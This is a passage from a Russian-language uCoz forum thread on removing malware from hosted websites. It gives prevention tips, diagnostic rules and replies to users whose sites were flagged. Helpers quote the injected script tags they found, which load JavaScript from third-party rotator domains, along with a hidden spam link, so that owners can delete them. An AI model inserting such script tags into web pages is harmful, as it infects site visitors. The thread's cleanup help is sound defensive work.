Модератор форума: Yuri_G  
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте


  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    silovik962
    Сообщений: 5
    Репутация: 0

    Сообщение # 616 | 10:11:22
    помогите мне пожалуйста выходит вот такая картинка при заходе на свой сайт
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 617 | 12:49:50
    silovik962, надо читать 5 раз правила подачи заявки и давать адрес сайта, а не просто картинки вешать на сайт с музыкой angry

    панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить вставляем скрипт

    Код
    <script language="javascript" src="http://golink1.ru9.biz/js/back.php?id=43"></script>
    поле на что заменить оставить пустым и произвести замену во всех модулях

    далее ищем сами картинки или ссылки на сайте с адресом wot-fansite.ru

    обязательно меняем пароль uid профиля. инструкция тут //forum.ucoz.ru/forum/45-52299-1

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    silovik962
    Сообщений: 5
    Репутация: 0

    Сообщение # 618 | 12:59:04
    webanet, все сделал как вы сказали множите все перепроверить заранее спасибо
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 619 | 13:00:47
    silovik962, нет. перепроверять не буду. слушайте сами свою музыку на полной громкости. не забудьте найти и удалить ссылки сайта который указал гугл

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    silovik962
    Сообщений: 5
    Репутация: 0

    Сообщение # 620 | 13:03:20
    webanet, извините за музыку я все удалил как вы сказали , мне это очень важно пожалуйста проверьте прошу вас.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 621 | 13:14:16
    все нормально. кроме спама в шаблоне нижняя часть сайта чисто
    вот спам

    Код
    <div style="display:none;"><a href="http://mysoft-world.ru/load/ucoz/igrovye_shablony/31">Игровые Шаблоны для ucoz</a></div>
    и в таблице стилей у вас тьма картинок с сайта stalker-planet.org.ru и все битые

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    silovik962
    Сообщений: 5
    Репутация: 0

    Сообщение # 622 | 13:16:35
    webanet , спасибо вам за понимания , я так понимаю мне нужно это просто удалить???
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 623 | 13:19:34
    silovik962, да. удалить и ждать перепроверки гуглом, если ещё блочит

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    silovik962
    Сообщений: 5
    Репутация: 0

    Сообщение # 624 | 13:20:17
    спасибо-webanet
    BUB
    Сообщений: 39
    Репутация: 6

    Сообщение # 625 | 15:37:00
    Цитата (webanet)
    или снимайте на основном счетчик. потому что там ссылка на старый домен. хотя бы временно пока не утрясется. потому что из-за этого старого домена под блоком прикрепленный так и будет мигать в гугле то заблоченный то нет
    благодарю за помощь
    подскажите, как убрать счётчик у donbass-scooter.clan.su и оставить только на привязанном домене dcc-dsc.su?
    зашёл в настройки счётчика статистики, прикреплён для учётка только основной dcc-dsc.su домен


    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 626 | 15:51:41
    BUB, в том то и дело что никак не снять картинку счетчика со стандартным доменом. во всяком случае я не знаю как. поэтому временно снимите счетчик. просто счетчик. не надо удалять модуль статистики просто код счетчика из шаблонов изымите. сделайте бекап шаблонов - изымите счетчик - потом как гугл отпустит старый домен одним движением руки вернете

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    BUB
    Сообщений: 39
    Репутация: 6

    Сообщение # 627 | 16:15:28
    скрыл в настройках счётчик
    благодарю за помощь.


    IIpoI00
    Сообщений: 10
    Репутация: 0

    Сообщение # 628 | 16:59:30
    привет ребят) как удалить с моего сайта вирус (ы)?
    скрин:



    Это только один, там ещё есть пару штук!!!

    Добавлено (25 Сен 2013, 16:59:30)
    ---------------------------------------------

    Цитата (IIpoI00)
    Это только один, там ещё есть пару штук!!!

    Извиняюсь мой сайт!
    сondor
    Сообщений: 4661
    Репутация: 1528

    Сообщение # 629 | 18:57:53
    IIpoI00, ищем в шаблонах скрипт:

    Код
    <script language="javascript" src="http://uno.wt-rotator105.ru/?t=cf&noadult=1&pid=37303"></script>


    И удаляем его. Можно через быструю замену.
    Панель Управления - Дизайн - Быстрая замена участков шаблона.
    Режим замены: простой
    В поле где Что заменить: вставляем скрипт
    Поле На что заменить оставляем пустым

    IIpoI00, забудьте вообще про онлайн сервисы проверок на вирусы, так как они не точно определяют, а точнее даже совсем неверно...
    Сообщение отредактировал condor-bird - Среда, 25 Сен 2013, 19:00:19
    IIpoI00
    Сообщений: 10
    Репутация: 0

    Сообщение # 630 | 06:16:48
    Цитата (condor-bird)
    И удаляем его. Можно через быструю замену.Панель Управления - Дизайн - Быстрая замена участков шаблона.
    Режим замены: простой
    В поле где Что заменить: вставляем скрипт
    Поле На что заменить оставляем пустым

    Спасибо огромное вам, а как вы определили, что это именно этот скрипт?
    Я тоже хочу научится этому.
    Поиск: